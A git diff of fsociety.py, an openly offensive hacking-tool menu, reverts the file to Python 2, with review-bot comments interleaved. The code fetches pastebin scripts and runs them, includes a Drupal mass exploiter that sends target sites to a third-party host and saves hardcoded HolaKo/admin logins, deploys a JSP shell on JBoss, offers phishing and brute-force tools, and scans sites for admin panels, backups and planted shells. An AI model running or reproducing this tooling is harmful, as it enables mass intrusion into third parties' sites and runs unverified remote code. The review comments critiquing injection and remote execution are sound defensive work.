diff --git a/fsociety.py b/fsociety.py index 4f9e7f5..56f6573 100644 --- a/fsociety.py +++ b/fsociety.py @@ -20,10 +20,10 @@ import sys import argparse import os -import http.client +import httplib import subprocess import re -import urllib.request +import urllib2 import socket import urllib import sys @@ -31,17 +31,16 @@ import telnetlib import glob import random -from queue import Queue +import Queue import threading import base64 import time -import configparser +import ConfigParser from sys import argv -#from commands import * +from commands import * from getpass import getpass from xml.dom import minidom -#from urlparse import urlparse -import urllib.parse +from urlparse import urlparse from optparse import OptionParser from time import gmtime, strftime, sleep @@ -68,7 +67,7 @@ def clearScr(): def yesOrNo(): - return(input("Continue Y / N: ") in yes) + return (raw_input("Continue Y / N: ") in yes) ''' @@ -77,7 +76,7 @@ def yesOrNo(): installDir = os.path.dirname(os.path.abspath(__file__)) + '/' configFile = installDir + "/fsociety.cfg" print(installDir) -config = configparser.RawConfigParser() +config = ConfigParser.RawConfigParser() config.read(configFile) toolDir = installDir + config.get('fsociety', 'toolDir') @@ -136,7 +135,7 @@ def agreement(): clearScr() print(termsAndConditions) print(mrrobot4) - agree = input("You must agree to our terms and conditions first (Y/n) ").lower() + agree = raw_input("You must agree to our terms and conditions first (Y/n) ").lower() if agree in yes: config.set('fsociety', 'agreement', 'true') @@ -144,7 +143,7 @@ class fsociety: def __init__(self): clearScr() self.createFolders() - print(fsocietylogo + color.RED + ''' + print (fsocietylogo + color.RED + ''' }--------------{+} Coded By Manisso {+}--------------{ }--------{+} GitHub.com/Manisso/fsociety {+}--------{ ''' + color.END + ''' 
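Review bot: The import hunks (`@@ -20,10 +20,10 @@` and `@@ -31,17 +31,16 @@`) re-enable `from commands import *`, a wildcard import of a module that was deprecated in Python 2.6 and does not exist in Python 3. Together with `httplib`, `urllib2`, `Queue`, `ConfigParser` and `urlparse`, this makes the file fail at import time on any Python 3 interpreter. Python 2 no longer receives security fixes, which matters for a script that talks to the network and shells out. If Python 2 must keep working, guarded imports keep both interpreters usable, e.g. `try: import urllib2` followed by `except ImportError: import urllib.request as urllib2`. The wildcard should become an explicit import of only the names the file uses, or be dropped if nothing from `commands` is used, which these hunks do not show.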
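Review bot: In the `@@ -216,7 +215,7 @@` hunk, `completed()` returns to the menu by calling `self.__init__()`, so every round trip nests another constructor call and the stack grows until the interpreter's recursion limit is hit. The same pattern appears in the `completed()` methods touched at `@@ -260,7`, `@@ -322,7`, `@@ -337,12`, `@@ -376,7`, `@@ -431,7`, `@@ -777,7`, `@@ -845,7` and `@@ -975,7`. A `while True:` loop around the prompt in a separate `run()` method, with `completed()` simply returning, avoids this. At minimum add a comment such as `# NOTE: re-enters __init__ recursively; depth grows with each menu visit`. The `__init__` bodies of these classes start outside the hunks.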
@@ -160,7 +159,7 @@ def __init__(self): {11}-CONTRIBUTORS {99}-EXIT\n ''') - choice = input(fsocietyPrompt) + choice = raw_input(fsocietyPrompt) clearScr() if choice == "1": informationGatheringMenu() @@ -204,7 +203,7 @@ def githubContributors(self): YboodP YbodP 88 Y8 88 88 Yb 88 88oodP 8bodP' ''') contributorsURL = 'https://api.github.com/repos/manisso/fsociety/contributors' - jsonResponseList = json.loads(urllib.request.urlopen(contributorsURL).read()) + jsonResponseList = json.loads(urllib2.urlopen(contributorsURL).read()) for dictionary in jsonResponseList: print(" * %s" % dictionary['login']) print('\n') @@ -216,7 +215,7 @@ def createFolders(self): os.makedirs(logDir) def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() def update(self): @@ -243,7 +242,7 @@ def __init__(self): " {3}--pyPISHER - Tool to create a mallicious website for password pishing") print(" {4}--SMTP Mailer - Tool to send SMTP mail\n ") print(" {99}-Back To Main Menu \n") - choice6 = input(fsocietyPrompt) + choice6 = raw_input(fsocietyPrompt) clearScr() if choice6 == "1": setoolkit() @@ -260,7 +259,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -289,7 +288,7 @@ def __init__(self): " {11}-BruteX - Automatically brute force all services running on a target") print(" {12}-Arachni - Web Application Security Scanner Framework \n ") print(" {99}-Back To Main Menu \n") - choiceweb = input(fsocietyPrompt) + choiceweb = raw_input(fsocietyPrompt) clearScr() if choiceweb == "1": maine() @@ -322,7 +321,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() 
@@ -337,12 +336,12 @@ class privateWebHacking: def __init__(self): clearScr() print(self.menuLogo) - target = input("Enter Target IP: ") + target = raw_input("Enter Target IP: ") Fscan(target) self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -361,7 +360,7 @@ def __init__(self): print(" {2}--POET") print(" {3}--Phishing Framework \n") print(" {99}-Return to main menu \n ") - choice11 = input(fsocietyPrompt) + choice11 = raw_input(fsocietyPrompt) clearScr() if choice11 == "1": sitechecker() @@ -376,7 +375,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -406,7 +405,7 @@ def __init__(self): print(" {7}--Doork") print(" {8}--Crips\n ") print(" {99}-Back To Main Menu \n") - choice2 = input(fsocietyPrompt) + choice2 = raw_input(fsocietyPrompt) clearScr() if choice2 == "1": nmap() @@ -431,7 +430,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -467,7 +466,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = input(self.targetPrompt) + target = raw_input(self.targetPrompt) self.menu(target) def menu(self, target): 
@@ -478,19 +477,19 @@ def menu(self, target): print(" {2}--Port Scan [-Pn]") print(" {3}--Operating System Detection [-A]\n") print(" {99}-Return to information gathering menu \n") - response = input("nmap ~# ") + response = raw_input("nmap ~# ") clearScr() logPath = "logs/nmap-" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) try: if response == "1": os.system("nmap -sV -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "2": os.system("nmap -Pn -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "3": os.system("nmap -A -oN %s %s" % (logPath, target)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "99": pass else: @@ -510,7 +509,7 @@ def __init__(self): else: print(alreadyInstalled) self.run() - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isfile("/usr/bin/setoolkit")) @@ -537,10 +536,10 @@ class host2ip: def __init__(self): clearScr() print(self.host2ipLogo) - host = input(" Enter a Host: ") + host = raw_input(" Enter a Host: ") ip = socket.gethostbyname(host) print(" %s has the IP of %s" % (host, ip)) - response = input(continuePrompt) + response = raw_input(continuePrompt) class wpscan: @@ -559,7 +558,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.menu(target) def installed(self): @@ -577,7 +576,7 @@ def menu(self, target): print(" {2}--Plugin Enumeration [--enumerate p]") print(" {3}--All Enumeration Tools [--enumerate]\n") print(" {99}-Return to information gathering menu \n") - response = input("wpscan ~# ") + response = raw_input("wpscan ~# ") clearScr() logPath = "../../logs/wpscan-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" 
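Review bot: In the `@@ -478,19 +477,19 @@ def menu` hunk, `target` is interpolated unquoted into the string passed to `os.system` (`"nmap -sV -oN %s %s" % (logPath, target)`). Per the preceding hunk it comes straight from `raw_input`, so any shell metacharacter typed or pasted at the prompt is interpreted by the shell with the privileges the tool runs under. Passing an argument list avoids the shell entirely: `subprocess.call(["nmap", "-sV", "-oN", logPath, target])` (`subprocess` is already imported), and likewise for the `-Pn` and `-A` branches. The same string-built `os.system` pattern with prompt input is visible in the hunks for `brutex`, `arachni`, `gabriel`, `bsqlbf`, `joomlarce`, `inurl` and `cmsfew`; in `inurl` the single quotes around `{0}` do not help, because a quote in the input closes them. `menu` continues past the end of the hunk.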
@@ -586,15 +585,15 @@ def menu(self, target): if response == "1": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate u --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "2": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate p --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "3": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate --log %s" % (wpscanOptions, logPath)) - response = input(continuePrompt) + response = raw_input(continuePrompt) elif response == "99": pass else: @@ -619,9 +618,9 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.run(target) - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -657,7 +656,7 @@ def __init__(self): clearScr() print(self.XSStrikeLogo) self.run() - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -687,9 +686,9 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = input(" Enter a Target: ") + target = raw_input(" Enter a Target: ") self.run(target) - response = input(continuePrompt) + response = raw_input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -764,7 +763,7 @@ def __init__(self): print( " {2}--BruteX - Automatically bruteforces all services running on a target\n") print(" {99}-Back To Main Menu \n") - choice3 = input("passwd ~# ") + choice3 = raw_input("passwd ~# ") clearScr() if choice3 == "1": cupp() @@ -777,7 +776,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() 
@@ -830,7 +829,7 @@ def __init__(self): print(" {2}--pixiewps") print(" {3}--Bluetooth Honeypot GUI Framework \n") print(" {99}-Back To The Main Menu \n") - choice4 = input(fsocietyPrompt) + choice4 = raw_input(fsocietyPrompt) clearScr() if choice4 == "1": reaver() @@ -845,7 +844,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -948,7 +947,7 @@ def __init__(self): print(" {8}--Bruteforce the Android Passcode given the hash and salt") print(" {9}--Joomla SQL injection Scanner \n ") print(" {99}-Go Back To Main Menu \n") - choice5 = input(fsocietyPrompt) + choice5 = raw_input(fsocietyPrompt) clearScr() if choice5 == "1": atscan() @@ -975,7 +974,7 @@ def __init__(self): self.completed() def completed(self): - input("Completed, click return to go back") + raw_input("Completed, click return to go back") self.__init__() @@ -1000,7 +999,7 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = input("Enter Target IP: ") + target = raw_input("Enter Target IP: ") os.system("brutex %s" % target) @@ -1025,7 +1024,7 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = input("Enter Target Hostname: ") + target = raw_input("Enter Target Hostname: ") os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) @@ -1046,7 +1045,7 @@ def gabriel(): os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") clearScr() os.system("python gabriel.py") - ftpbypass = input("Enter Target IP and Use Command:") + ftpbypass = raw_input("Enter Target IP and Use Command:") os.system("python gabriel.py %s" % ftpbypass) 
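Review bot: In the `@@ -1046,7 +1045,7 @@ def gabriel()` hunk, a script is fetched with `wget http://pastebin.com/raw/Szg20yUh` and run immediately with `python gabriel.py`, over plaintext HTTP and with no integrity check. Whoever can edit that paste or sit on the network path gets code execution on the machine running the tool. `joomlarce` (`@@ -1107,13`) does the same with another paste, and `bsqlbf` and `cmsfew` download and run remote scripts as well. The script should be vendored into the repository at a reviewed revision, or its SHA-256 compared against a pinned value before execution. Until then, a comment such as `# NOTE(review): remote code is executed unverified` above the `wget` line would make the risk visible. `gabriel()` starts outside the hunk.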
@@ -1059,7 +1058,7 @@ def sitechecker(): def ifinurl(): print(''' This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.''') print('Do You Want To Install InurlBR ? ') - cinurl = input("Y/N: ") + cinurl = raw_input("Y/N: ") if cinurl in yes: inurl() else: @@ -1069,14 +1068,14 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = input("select target: ") + cbsq = raw_input("select target: ") os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") def atscan(): - print("Do You To Install ATSCAN ?") + print ("Do You To Install ATSCAN ?") if yesOrNo(): os.system("rm -rf ATSCAN") os.system( @@ -1086,8 +1085,8 @@ def atscan(): def commix(): - print("Automated All-in-One OS Command Injection and Exploitation Tool.") - print("usage: python commix.py --help") + print ("Automated All-in-One OS Command Injection and Exploitation Tool.") + print ("usage: python commix.py --help") if yesOrNo(): os.system( "git clone --depth=1 https://github.com/stasinopoulos/commix.git commix") @@ -1107,13 +1106,13 @@ def joomlarce(): os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = input("Select a targets list:") + jmtarget = raw_input("Select a targets list:") os.system("python temp.py %s" % jmtarget) def inurl(): - dork = input("select a Dork:") - output = input("select a file to save:") + dork = raw_input("select a Dork:") + output = raw_input("select a file to save:") os.system( "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) webHackingMenu.completed("InurlBR") 
@@ -1131,11 +1130,11 @@ def insinurl(): def jboss(): clearScr() - print("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") - print("deployed, the script uses its upload and command execution capability to") - print("provide an interactive session.") - print("") - print("usage: ./e.sh target_ip tcp_port ") + print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") + print ("deployed, the script uses its upload and command execution capability to") + print ("provide an interactive session.") + print ("") + print ("usage: ./e.sh target_ip tcp_port ") print("Continue: y/n") if yesOrNo(): os.system( @@ -1146,13 +1145,13 @@ def jboss(): def wppluginscan(): Notfound = [404, 401, 400, 403, 406, 301] - sitesfile = input("sites file: ") - filepath = input("Plugins File: ") + sitesfile = raw_input("sites file: ") + filepath = raw_input("Plugins File: ") def scan(site, dir): global resp try: - conn = http.client.HTTPConnection(site) + conn = httplib.HTTPConnection(site) conn.request('HEAD', "/wp-content/plugins/" + dir) resp = conn.getresponse().status except Exception as message: @@ -1179,7 +1178,7 @@ def main(): def sqlmap(): - print("usage: python sqlmap.py -h") + print ("usage: python sqlmap.py -h") if yesOrNo(): os.system( "git clone --depth=1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ") @@ -1192,9 +1191,9 @@ def grabuploadedlink(url): for dir in directories: currentcode = urllib.urlopen(url + dir).getcode() if currentcode == 200 or currentcode == 403: - print("-------------------------") - print(" [ + ] Found Directory: " + str(url + dir) + " [ + ]") - print("-------------------------") + print "-------------------------" + print " [ + ] Found Directory: " + str(url + dir) + " [ + ]" + print "-------------------------" upload.append(url + dir) except: pass 
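Review bot: In the `@@ -1192,9 +1191,9 @@ def grabuploadedlink` hunk, parenthesised single-argument calls such as `print("-------------------------")` are turned into print statements. That is unnecessary for Python 2, where a single parenthesised argument prints identically, and it makes the file a syntax error on Python 3. The same conversion is repeated in most later hunks (`grabshell`, `gravity`, `Fscan`, `drupal`, `wppjmla`, `wpminiscanner` and others). For the multi-argument prints, `from __future__ import print_function` at the top of the file gives the intended output on Python 2 without the statement form.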
@@ -1206,17 +1205,17 @@ def grabshell(url): for shell in shells: currentcode = urllib.urlopen(upl + shell).getcode() if currentcode == 200: - print("-------------------------") - print(" [ ! ] Found Shell: " + \ - str(upl + shell) + " [ ! ]") - print("-------------------------") + print "-------------------------" + print " [ ! ] Found Shell: " + \ + str(upl + shell) + " [ ! ]" + print "-------------------------" except: pass def shelltarget(): print("Exemple: http://target.com") - line = input("target: ") + line = raw_input("target: ") line = line.rstrip() grabuploadedlink(line) grabshell(line) @@ -1291,11 +1290,11 @@ def check_gravityforms(sites): def gravity(): - ip = input('Enter IP: ') + ip = raw_input('Enter IP: ') sites = bing_all_grabber(str(ip)) gravityforms = check_gravityforms(sites) for ss in gravityforms: - print(ss) + print ss print('\n') print('[*] Found, ', len(gravityforms), ' gravityforms.') @@ -1312,8 +1311,8 @@ def shellnoob(): def androidhash(): - key = input("Enter the android hash: ") - salt = input("Enter the android salt: ") + key = raw_input("Enter the android hash: ") + salt = raw_input("Enter the android salt: ") os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( @@ -1322,7 +1321,7 @@ def androidhash(): def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = input("Select a target: ") + target = raw_input("Select a target: ") os.system( "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") os.system("python cms.py %s" % target) @@ -1371,9 +1370,9 @@ class Fscan: def __init__(self, serverip): self.serverip = serverip self.getSites(False) - print(menu) + print menuu while True: - choice = input(fsocietyPrompt) + choice = raw_input(fsocietyPrompt) if choice == '1': self.getSites(True) elif choice == '2': 
@@ -1391,7 +1390,7 @@ def __init__(self, serverip): elif choice == '8': self.grabSqli() elif choice == '9': - ran = input(' Enter range of ports, (ex: 1-1000) -> ') + ran = raw_input(' Enter range of ports, (ex: 1-1000) -> ') self.portScanner(1, ran) elif choice == '10': self.portScanner(2, None) @@ -1401,12 +1400,12 @@ def __init__(self, serverip): self.cloudflareBypasser() elif choice == '99': fsociety() - con = input(' Continue [Y/n] -> ') + con = raw_input(' Continue [Y/n] -> ') if con[0].upper() == 'N': exit() else: clearScr() - print(menuu) + print menuu def getSites(self, a): ''' @@ -1440,7 +1439,7 @@ def getSites(self, a): clearScr() print('[*] Found ', len(lista), ' Website\n') for site in self.sites: - print(site) + print site def getWordpress(self): ''' @@ -1469,7 +1468,7 @@ def getWordpress(self): clearScr() print('[*] Found ', len(lista), ' Wordpress Website\n') for site in lista: - print(site) + print site def getJoomla(self): ''' @@ -1494,7 +1493,7 @@ def getJoomla(self): clearScr() print('[*] Found ' + len(lista) + ' Joomla Website\n') for site in lista: - print(site) + print site ############################ # find admin panels 
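Review bot: In the `@@ -1401,12 +1400,12 @@` hunk, `con[0].upper()` raises `IndexError` when the user just presses Enter, although the prompt `Continue [Y/n]` advertises Y as the default. Slicing handles the empty string: `if con[:1].upper() == 'N':`. The enclosing `__init__` starts outside the hunk.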
@@ -1504,14 +1503,15 @@ def findPanels(self): the attacker may do a lot of vulnerability tests on the admin area ''' - print("[~] Finding admin panels") - adminList=['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'cp','up/cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site',] + print "[~] Finding admin panels" + adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', + 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site'] clearScr() for site in self.sites: for admin in adminList: try: if urllib.urlopen(site + admin).getcode() == 200: - print(" [*] Found admin panel -> ", site + admin) + print " [*] Found admin panel -> ", site + admin except IOError: pass ############################ 
@@ -1525,12 +1525,12 @@ def findZip(self): zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] clearScr() - print("[~] Finding zip file") + print "[~] Finding zip file" for site in self.sites: for zip1 in zipList: try: if urllib.urlopen(site + zip1).getcode() == 200: - print(" [*] Found zip file -> ", site + zip1) + print " [*] Found zip file -> ", site + zip1 except IOError: pass @@ -1543,7 +1543,7 @@ def findUp(self): upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] clearScr() - print("[~] Finding Upload") + print "[~] Finding Upload" for site in self.sites: for up in upList: try: @@ -1551,7 +1551,7 @@ def findUp(self): html = urllib.urlopen(site + up).readlines() for line in html: if re.findall('type=file', line): - print(" [*] Found upload -> ", site + up) + print " [*] Found upload -> ", site + up except IOError: pass @@ -1564,7 +1564,7 @@ def getUsers(self): (you can use medusa or hydra) ''' clearScr() - print("[~] Grabbing Users") + print "[~] Grabbing Users" userslist = [] for site1 in self.sites: try: @@ -1579,11 +1579,11 @@ def getUsers(self): resp = urllib2.urlopen( site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() if 'invalid username' not in resp.lower(): - print('\t [*] Found -> ', site) + print '\t [*] Found -> ', site userslist.append(site) break else: - print(site) + print site site = site[:-1] except: 
@@ -1591,7 +1591,7 @@ def getUsers(self): clearScr() for user in userslist: - print(user) + print user def cloudflareBypasser(self): ''' @@ -1600,7 +1600,7 @@ def cloudflareBypasser(self): method from a guy in madleets ''' clearScr() - print("[~] Bypassing cloudflare") + print "[~] Bypassing cloudflare" subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] for site in self.sites: site.replace('http://', '') @@ -1611,11 +1611,11 @@ def cloudflareBypasser(self): pass for sub in subdoms: doo = sub + '.' + site - print(' [~] Trying -> ', doo) + print ' [~] Trying -> ', doo try: ddd = socket.gethostbyname(doo) if ddd != ip: - print(' [*] Cloudflare bypassed -> ', ddd) + print ' [*] Cloudflare bypassed -> ', ddd break except socket.error: pass @@ -1630,7 +1630,8 @@ def getServerBanner(self): try: s = 'http://' + self.serverip httpresponse = urllib.urlopen(s) - print(' [*] Server header -> ', httpresponse.headers.getheader('server')) + print ' [*] Server header -> ', httpresponse.headers.getheader( + 'server') except: print('[*] Server header -> Not Found') @@ -1666,7 +1667,7 @@ def checkSqli(self, s): tool in my blog ''' clearScr() - print("[~] Checking SQL injection") + print "[~] Checking SQL injection" payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] check = re.compile( @@ -1681,7 +1682,7 @@ def checkSqli(self, s): for line in html: checker = re.findall(check, line) if len(checker) != 0: - print(' [*] SQLi found -> ', power) + print ' [*] SQLi found -> ', power except: pass @@ -1692,7 +1693,7 @@ def portScanner(self, mode, ran): or with common ports (al-swisre idea) ''' clearScr() - print("[~] Scanning Ports") + print "[~] Scanning Ports" if mode == 1: a = ran.split('-') @@ -1710,7 +1711,7 @@ def do_it(ip, port): sock = sock.connect_ex((ip, port)) if sock == 0: - print(" [*] Port %i is open" % port) + print " [*] Port %i is open" % port ############################ 
@@ -1724,7 +1725,7 @@ def do_it(ip, port): def drupal(): '''Drupal Exploit Binger All Websites Of server ''' - ip = input('1- IP: ') + ip = raw_input('1- IP: ') page = 1 while page <= 50: @@ -1740,32 +1741,32 @@ def drupal(): for url in findurl: try: - urlpa = urllib.parse(url) + urlpa = urlparse(url) site = urlpa.netloc - print("[+] Testing At " + site) + print "[+] Testing At " + site resp = urllib2.urlopen( 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit') read = resp.read() if "User: HolaKo" in read: - print("Exploit found =>" + site) + print "Exploit found =>" + site - print("user:HolaKo\npass:admin") + print "user:HolaKo\npass:admin" a = open('up.txt', 'a') a.write(site + '\n') a.write("user:" + user + "\npass:" + pwd + "\n") else: - print("[-] Expl Not Found:( ") + print "[-] Expl Not Found:( " except Exception as ex: - print(ex) + print ex sys.exit(0) # Drupal Server ExtraCtor def getdrupal(): - ip = input('Enter The Ip: ') + ip = raw_input('Enter The Ip: ') page = 1 sites = list() while page <= 50: @@ -1779,17 +1780,17 @@ def getdrupal(): page += 1 for url in findurl: - split = urllib.parse(url) + split = urlparse(url) site = split.netloc if site not in sites: - print(site) + print site sites.append(site) # Drupal Mass List Exploiter def drupallist(): - listop = input("Enter The list Txt: ") + listop = raw_input("Enter The list Txt: ") fileopen = open(listop, 'r') content = fileopen.readlines() for i in content: 
@@ -1799,22 +1800,22 @@ def drupallist(): 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit') readcontent = openurl.read() if "Success" in readcontent: - print("[+]Success =>" + url) - print("[-]username:HolaKo\n[-]password:admin") + print "[+]Success =>" + url + print "[-]username:HolaKo\n[-]password:admin" save = open('drupal.txt', 'a') save.write( url + "\n" + "[-]username:HolaKo\n[-]password:admin\n") else: - print(i + "=> exploit not found ") + print i + "=> exploit not found " except Exception as ex: - print(ex) + print ex def maine(): - print(minu) - choose = input("choose a number: ") + print minu + choose = raw_input("choose a number: ") while True: if choose == "1": @@ -1890,20 +1891,20 @@ def check_joomla(sites): def wppjmla(): - ipp = input('Enter Target IP: ') + ipp = raw_input('Enter Target IP: ') sites = bing_all_grabber(str(ipp)) wordpress = check_wordpress(sites) joomla = check_joomla(sites) for ss in wordpress: - print(ss) - print('[+] Found ! ', len(wordpress), ' Wordpress Websites') - print('-' * 30 + '\n') + print ss + print '[+] Found ! ', len(wordpress), ' Wordpress Websites' + print '-' * 30 + '\n' for ss in joomla: - print(ss) + print ss - print('[+] Found ! ', len(joomla), ' Joomla Websites') + print '[+] Found ! ', len(joomla), ' Joomla Websites' - print('\n') + print '\n' # initialise the fscan function ############################ @@ -1911,8 +1912,8 @@ def wppjmla(): def grabsqli(ip): try: - print(color.OKBLUE + "Check_Uplaod... ") - print('\n') + print color.OKBLUE + "Check_Uplaod... " + print '\n' page = 1 while page <= 21: @@ -1926,7 +1927,7 @@ def grabsqli(ip): try: response = urllib2.urlopen(i).read() checksqli(i) - except urllib2.HTTPError as e: + except urllib2.HTTPError, e: str(sites).strip(i) page = page + 10 @@ -1942,7 +1943,7 @@ def checksqli(sqli): def sqlscan(): - ip = input('Enter IP -> ') + ip = raw_input('Enter IP -> ') grabsqli(ip) 
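Review bot: In the `@@ -1926,7 +1927,7 @@ def grabsqli` hunk, `except urllib2.HTTPError, e:` is the comma form that only Python 2 parses. The `as` form being removed is valid on Python 2.6 and later as well, so the line can stay `except urllib2.HTTPError as e:`. In the same handler `e` is never used and `str(sites).strip(i)` discards its result, so the error is silently dropped. If ignoring it is intended, a comment such as `# skip URLs that return an HTTP error` would say so. `grabsqli` starts and ends outside the hunk.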
@@ -2052,7 +2053,7 @@ def check_wpsymposium(sites): def wpminiscanner(): - ip = input('Enter IP: ') + ip = raw_input('Enter IP: ') sites = bing_all_grabber(str(ip)) wordpress = check_wordpress(sites) wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites) @@ -2061,32 +2062,32 @@ def wpminiscanner(): wpeasyupload = check_wpeasyupload(sites) wpsymposium = check_wpsymposium(sites) for ss in wordpress: - print(ss) - print('[*] Found, ', len(wordpress), ' wordpress sites.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wordpress), ' wordpress sites.' + print '-' * 30 + '\n' for ss in wpstorethemeremotefileupload: - print(ss) - print('[*] Found, ', len( - wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len( + wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.' + print '-' * 30 + '\n' for ss in wpcontactcreativeform: - print(ss) - print('[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.' + print '-' * 30 + '\n' for ss in wplazyseoplugin: - print(ss) - print('[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.' + print '-' * 30 + '\n' for ss in wpeasyupload: - print(ss) - print('[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.') - print('-' * 30 + '\n') + print ss + print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.' + print '-' * 30 + '\n' for ss in wpsymposium: - print(ss) + print ss - print('[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.') + print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.' - print('\n') + print '\n' 